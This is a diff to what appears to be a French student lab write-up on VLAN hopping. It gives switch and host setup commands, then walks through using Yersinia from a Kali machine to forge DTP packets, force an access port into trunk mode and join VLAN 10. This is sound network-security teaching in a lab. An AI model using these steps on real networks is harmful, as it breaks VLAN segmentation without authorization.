diff --git a/content/03_vlan_hopping.md b/content/03_vlan_hopping.md
index 14896bcf757a5facc909d93a349dcf87b2a6a8b3..06f3f934db93551f676331421ec27eb8a702d72e 100644
--- a/content/03_vlan_hopping.md
+++ b/content/03_vlan_hopping.md
@@ -52,6 +52,116 @@
 
 ### Attaque du DTP avec `Yersinia`
 
+1. Configurez le VLAN 10 sur S1 et S2, avec G0/1 en mode access et G0/0 en mode trunk.
+    - Configuration de l'interface `GigabitEthernet 0/0` en mode `trunk` (S1 et S2) :
+    
+    ```
+    Switch>en
+    Switch#conf t
+    Switch(config)#vlan 10
+    Switch(config-vlan)#exit
+    Switch(config)#interface GigabitEthernet 0/0
+    Switch(config-if)#switchport trunk encapsulation dot1q
+    Switch(config-if)#switchport mode trunk
+    Switch(config-if)#no shut
+    Switch(config-if)#end
+    ```
+
+    \newpage
+
+    - Configuration de l'interface `GigabitEthernet 0/1` en mode `access` (S1 et S2) :
+
+    ```
+    Switch>en
+    Switch#conf t
+    Switch(config)#interface GigabitEthernet 0/1
+    Switch(config-if)#switchport access vlan 10
+    Switch(config-if)#no shut
+    Switch(config-if)#end
+    ```
+
+2. Configurez l’adresse IP de H1 et H2 à 10.0.0.1/24 et 10.0.0.2/24 respectivement.
+    - H1 :
+
+    ```bash
+    hostnamectl set-hostname H1
+    ip addr add 10.0.0.1/24 dev eth0
+    ip link set up dev eth0
+    ```
+
+    - H2 :
+
+    ```bash
+    hostnamectl set-hostname H2
+    ip addr add 10.0.0.2/24 dev eth0
+    ip link set up dev eth0
+    ```
+
+3. 
+    - Configurez l’adresse IP de `kali-linux-1` à 10.0.0.3/24. 
+
+    ```bash
+    sudo ip addr add 10.0.0.3/24 dev eth0
+    sudo ip link set up dev eth0
+    ```
+
+    - Arrivez-vous à pinger H1 et H2 depuis cette machine ? Pourquoi ?
+        - On n'arrive pas à pinger H1 et H2 depuis `kali-linux-1` car cette
+        machine se trouve en dehors du VLAN 10 suite au fait qu'elle est reliée
+        au switch S1 par l'interface `GigabitEthernet 0/2`.
+
+    - Enlevez cette IP de `kali-linux-1` :
+
+    ```bash
+    sudo ip addr del 10.0.0.3/24 dev eth0
+    sudo ip link set down dev eth0
+    ```
+
+4. Quel est la valeur de `Operational Mode` du port G0/2 sur le switch S1 ?
+    - Afin d'obtenir cette information il faut exécuter la commande suivante :
+
+    ```
+    show interface GigabitEthernet 0/2 switchport
+    ```
+    
+    Sa valeur est : `static access`.
+
+5. Effectuez maintenant une attaque à distance depuis la machine Kali en
+exécutant la commande `sudo yersinia -I`. Selectionnez, avec la touche `g`, les
+attaques de type `Dynamic trunking Protocol`. Appuyer sur `x`, puis `1` pour
+`Enable trunking`.
+
+6. Quel est à présent la valeur de Operational Mode du port G0/2 sur le switch
+S1 ? Pourquoi ?
+    - À présent la valeur du champ `Operational Mode` est `trunk`. Grâce à 
+    l'outil `yersinia`, on a pu forger un paquet DTP qui nous a permis de nous 
+    faire passer pour switch qui désire établir un trunk avec S1. En envoyant
+    ce paquet sur l'interface GigabitEthernet 0/2 de S1, on a pu la faire basculer
+    en mode `trunk`.
+
+7. Il est a présent très simple pour la machine Kali de rejoindre le vlan 10.
+Rajoutez-y simplement une interface qui tagge tout les paquets avec le numéro
+de vlan 10 par la commande suivante :
+
+    ```bash
+    ip link add link eth0 name eth0.10 type vlan id 10
+    ```
+
+8. 
+    - Configurez eth0.10 avec l’IP 10.0.0.3/24.
+
+    ```bash
+    sudo ip addr add 10.0.0.3/24 dev eth0.10
+    sudo ip link set up dev eth0.10
+    ```
+
+    - Arrivez-vous à pinger 10.0.0.1 et 10.0.0.2 ? Expliquez pourquoi ?
+        - Oui, à présent nous arrivons à pinger H1 et H2 car nous nous retrouvons
+        à présent sur le VLAN 10 (_**jsp, faut vérifier si ce n'est pas le VLAN
+        natif**_) qui relie H1 à H2.
+
+
+
 ### Sécurisation des switches